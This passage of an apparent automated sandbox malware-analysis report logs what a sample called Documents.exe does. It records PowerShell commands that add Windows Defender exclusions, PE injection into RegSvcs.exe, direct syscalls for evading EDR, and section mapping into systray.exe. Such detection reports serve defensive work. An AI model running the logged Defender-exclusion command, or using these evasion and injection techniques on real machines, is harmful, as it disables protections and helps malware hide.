                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F29A0 mov eax, dword ptr fs:[00000030h]9_2_014F29A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01510854 mov eax, dword ptr fs:[00000030h]9_2_01510854
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F2840 mov ecx, dword ptr fs:[00000030h]9_2_014F2840
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E4859 mov eax, dword ptr fs:[00000030h]9_2_014E4859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E4859 mov eax, dword ptr fs:[00000030h]9_2_014E4859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156E872 mov eax, dword ptr fs:[00000030h]9_2_0156E872
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156E872 mov eax, dword ptr fs:[00000030h]9_2_0156E872
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01576870 mov eax, dword ptr fs:[00000030h]9_2_01576870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01576870 mov eax, dword ptr fs:[00000030h]9_2_01576870
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156C810 mov eax, dword ptr fs:[00000030h]9_2_0156C810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151A830 mov eax, dword ptr fs:[00000030h]9_2_0151A830
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158483A mov eax, dword ptr fs:[00000030h]9_2_0158483A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158483A mov eax, dword ptr fs:[00000030h]9_2_0158483A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01502835 mov eax, dword ptr fs:[00000030h]9_2_01502835
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01502835 mov eax, dword ptr fs:[00000030h]9_2_01502835
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01502835 mov eax, dword ptr fs:[00000030h]9_2_01502835
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01502835 mov ecx, dword ptr fs:[00000030h]9_2_01502835
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01502835 mov eax, dword ptr fs:[00000030h]9_2_01502835
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01502835 mov eax, dword ptr fs:[00000030h]9_2_01502835
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150E8C0 mov eax, dword ptr fs:[00000030h]9_2_0150E8C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C8F9 mov eax, dword ptr fs:[00000030h]9_2_0151C8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151C8F9 mov eax, dword ptr fs:[00000030h]9_2_0151C8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AA8E4 mov eax, dword ptr fs:[00000030h]9_2_015AA8E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0887 mov eax, dword ptr fs:[00000030h]9_2_014E0887
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156C89D mov eax, dword ptr fs:[00000030h]9_2_0156C89D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158EB50 mov eax, dword ptr fs:[00000030h]9_2_0158EB50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01594B4B mov eax, dword ptr fs:[00000030h]9_2_01594B4B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01594B4B mov eax, dword ptr fs:[00000030h]9_2_01594B4B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01576B40 mov eax, dword ptr fs:[00000030h]9_2_01576B40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01576B40 mov eax, dword ptr fs:[00000030h]9_2_01576B40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015AAB40 mov eax, dword ptr fs:[00000030h]9_2_015AAB40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01588B42 mov eax, dword ptr fs:[00000030h]9_2_01588B42
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014DCB7E mov eax, dword ptr fs:[00000030h]9_2_014DCB7E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155EB1D mov eax, dword ptr fs:[00000030h]9_2_0155EB1D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155EB1D mov eax, dword ptr fs:[00000030h]9_2_0155EB1D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155EB1D mov eax, dword ptr fs:[00000030h]9_2_0155EB1D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155EB1D mov eax, dword ptr fs:[00000030h]9_2_0155EB1D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155EB1D mov eax, dword ptr fs:[00000030h]9_2_0155EB1D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155EB1D mov eax, dword ptr fs:[00000030h]9_2_0155EB1D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155EB1D mov eax, dword ptr fs:[00000030h]9_2_0155EB1D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155EB1D mov eax, dword ptr fs:[00000030h]9_2_0155EB1D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155EB1D mov eax, dword ptr fs:[00000030h]9_2_0155EB1D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150EB20 mov eax, dword ptr fs:[00000030h]9_2_0150EB20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150EB20 mov eax, dword ptr fs:[00000030h]9_2_0150EB20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A8B28 mov eax, dword ptr fs:[00000030h]9_2_015A8B28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015A8B28 mov eax, dword ptr fs:[00000030h]9_2_015A8B28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0BCD mov eax, dword ptr fs:[00000030h]9_2_014E0BCD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0BCD mov eax, dword ptr fs:[00000030h]9_2_014E0BCD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0BCD mov eax, dword ptr fs:[00000030h]9_2_014E0BCD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158EBD0 mov eax, dword ptr fs:[00000030h]9_2_0158EBD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01500BCB mov eax, dword ptr fs:[00000030h]9_2_01500BCB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01500BCB mov eax, dword ptr fs:[00000030h]9_2_01500BCB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01500BCB mov eax, dword ptr fs:[00000030h]9_2_01500BCB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156CBF0 mov eax, dword ptr fs:[00000030h]9_2_0156CBF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150EBFC mov eax, dword ptr fs:[00000030h]9_2_0150EBFC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8BF0 mov eax, dword ptr fs:[00000030h]9_2_014E8BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8BF0 mov eax, dword ptr fs:[00000030h]9_2_014E8BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8BF0 mov eax, dword ptr fs:[00000030h]9_2_014E8BF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01594BB0 mov eax, dword ptr fs:[00000030h]9_2_01594BB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01594BB0 mov eax, dword ptr fs:[00000030h]9_2_01594BB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0BBE mov eax, dword ptr fs:[00000030h]9_2_014F0BBE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0BBE mov eax, dword ptr fs:[00000030h]9_2_014F0BBE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0A5B mov eax, dword ptr fs:[00000030h]9_2_014F0A5B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014F0A5B mov eax, dword ptr fs:[00000030h]9_2_014F0A5B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6A50 mov eax, dword ptr fs:[00000030h]9_2_014E6A50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6A50 mov eax, dword ptr fs:[00000030h]9_2_014E6A50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6A50 mov eax, dword ptr fs:[00000030h]9_2_014E6A50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6A50 mov eax, dword ptr fs:[00000030h]9_2_014E6A50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6A50 mov eax, dword ptr fs:[00000030h]9_2_014E6A50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6A50 mov eax, dword ptr fs:[00000030h]9_2_014E6A50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E6A50 mov eax, dword ptr fs:[00000030h]9_2_014E6A50
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155CA72 mov eax, dword ptr fs:[00000030h]9_2_0155CA72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0155CA72 mov eax, dword ptr fs:[00000030h]9_2_0155CA72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0158EA60 mov eax, dword ptr fs:[00000030h]9_2_0158EA60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151CA6F mov eax, dword ptr fs:[00000030h]9_2_0151CA6F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151CA6F mov eax, dword ptr fs:[00000030h]9_2_0151CA6F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151CA6F mov eax, dword ptr fs:[00000030h]9_2_0151CA6F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0156CA11 mov eax, dword ptr fs:[00000030h]9_2_0156CA11
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01504A35 mov eax, dword ptr fs:[00000030h]9_2_01504A35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01504A35 mov eax, dword ptr fs:[00000030h]9_2_01504A35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151CA38 mov eax, dword ptr fs:[00000030h]9_2_0151CA38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151CA24 mov eax, dword ptr fs:[00000030h]9_2_0151CA24
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0150EA2E mov eax, dword ptr fs:[00000030h]9_2_0150EA2E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01514AD0 mov eax, dword ptr fs:[00000030h]9_2_01514AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01514AD0 mov eax, dword ptr fs:[00000030h]9_2_01514AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0AD0 mov eax, dword ptr fs:[00000030h]9_2_014E0AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01536ACC mov eax, dword ptr fs:[00000030h]9_2_01536ACC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01536ACC mov eax, dword ptr fs:[00000030h]9_2_01536ACC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01536ACC mov eax, dword ptr fs:[00000030h]9_2_01536ACC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151AAEE mov eax, dword ptr fs:[00000030h]9_2_0151AAEE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0151AAEE mov eax, dword ptr fs:[00000030h]9_2_0151AAEE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01518A90 mov edx, dword ptr fs:[00000030h]9_2_01518A90
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EEA80 mov eax, dword ptr fs:[00000030h]9_2_014EEA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EEA80 mov eax, dword ptr fs:[00000030h]9_2_014EEA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EEA80 mov eax, dword ptr fs:[00000030h]9_2_014EEA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EEA80 mov eax, dword ptr fs:[00000030h]9_2_014EEA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EEA80 mov eax, dword ptr fs:[00000030h]9_2_014EEA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EEA80 mov eax, dword ptr fs:[00000030h]9_2_014EEA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EEA80 mov eax, dword ptr fs:[00000030h]9_2_014EEA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EEA80 mov eax, dword ptr fs:[00000030h]9_2_014EEA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014EEA80 mov eax, dword ptr fs:[00000030h]9_2_014EEA80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015B4A80 mov eax, dword ptr fs:[00000030h]9_2_015B4A80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8AA0 mov eax, dword ptr fs:[00000030h]9_2_014E8AA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8AA0 mov eax, dword ptr fs:[00000030h]9_2_014E8AA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01536AA4 mov eax, dword ptr fs:[00000030h]9_2_01536AA4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0D59 mov eax, dword ptr fs:[00000030h]9_2_014E0D59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0D59 mov eax, dword ptr fs:[00000030h]9_2_014E0D59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E0D59 mov eax, dword ptr fs:[00000030h]9_2_014E0D59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8D59 mov eax, dword ptr fs:[00000030h]9_2_014E8D59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8D59 mov eax, dword ptr fs:[00000030h]9_2_014E8D59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8D59 mov eax, dword ptr fs:[00000030h]9_2_014E8D59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_014E8D59 mov eax, dword ptr fs:[00000030h]9_2_014E8D59
                    Source: C:\Users\user\Desktop\Documents.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe"
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe"
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uFEeKIucsX.exe"Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\Documents.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtQueryAttributesFile: Direct from: 0x76EF2E6C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtQuerySystemInformation: Direct from: 0x76EF48CC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtOpenSection: Direct from: 0x76EF2E0C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtDeviceIoControlFile: Direct from: 0x76EF2AEC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtQueryInformationToken: Direct from: 0x76EF2CAC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtCreateFile: Direct from: 0x76EF2FEC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtOpenFile: Direct from: 0x76EF2DCC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtTerminateThread: Direct from: 0x76EF2FCC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtOpenKeyEx: Direct from: 0x76EF2B9C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtSetInformationProcess: Direct from: 0x76EF2C5C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtNotifyChangeKey: Direct from: 0x76EF3C2C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtCreateMutant: Direct from: 0x76EF35CC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtResumeThread: Direct from: 0x76EF36AC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtMapViewOfSection: Direct from: 0x76EF2D1C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2E
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtQuerySystemInformation: Direct from: 0x76EF2DFC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtDelayExecution: Direct from: 0x76EF2DDC
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtQueryInformationProcess: Direct from: 0x76EF2C26
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtSetInformationThread: Direct from: 0x76EE63F9
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtClose: Direct from: 0x76EF2B6C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtSetInformationThread: Direct from: 0x76EF2B4C
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                    Source: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exeNtCreateKey: Direct from: 0x76EF2C6C
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Documents.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Maps a DLL or memory area into another process
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\hzuGXVXlIlqhzTaLrsoahghOMClgjaLtkeNhEYzbfIMXqVfl\vWFGbvOdxI.exe protection: execute and read and writeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
